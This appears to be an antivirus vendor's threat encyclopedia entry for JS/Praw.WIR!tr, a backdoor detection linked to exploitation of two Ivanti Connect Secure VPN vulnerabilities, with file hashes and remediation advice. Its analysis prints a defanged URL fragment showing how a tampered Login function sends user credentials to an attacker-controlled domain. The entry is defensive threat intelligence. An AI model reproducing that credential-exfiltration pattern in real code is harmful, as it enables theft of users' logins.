JS/Praw.WIR!tr
Analysis
JS/Praw.WIR!tr is a generic detection for a backdoor trojan.
Since this is a generic detection, this malware may have varying behaviour.
Below are some of its observed characteristics/behaviours:
- This malware is related to the exploitation of two vulnerabilities, CVE-2023-46805 and CVE-2024-21887 targeting Ivanti Connect Secure VPN.
- Remote code execution (RCE) and unauthenticated command execution can be achieved upon successful exploitation.
- The "Login" function is modified to POST user credentials to the attacker-controlled domain. An example is shown below:
- hxxps://[REMOVED].fr/IMG/xml.php?a=" + a +"&b="+ b+"&c="+c
- This malware has been associated with the following third party article/advisory.
- https://nvd.nist.gov/vuln/detail/CVE-2023-46805
- https://nvd.nist.gov/vuln/detail/CVE-2024-21887/li>
- Following are some of the near/exact IOCs/file hash associated with this detection:
- Md5: 2ec505088b942c234f39a37188e80d7a
Sha256: d4de1b866f94cdc43e55fab932880da1f4e9c7406bb17926e30baa9b7b824ecb - Md5: e8489983d73ed30a4240a14b1f161254
Sha256: e1d0ccfb7f1c46c7b8b8b154c97bac33f3ba89dae6481464cbe1448aca1e9dea
- Md5: 2ec505088b942c234f39a37188e80d7a
Recommended Action
- Make sure that your FortiGate/FortiClient system is using the latest AV database.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Telemetry
Detection Availability
FortiGate | |
---|---|
Extended | |
FortiClient | |
FortiMail | |
FortiSandbox | |
FortiWeb | |
Web Application Firewall | |
FortiIsolator | |
FortiDeceptor | |
FortiEDR |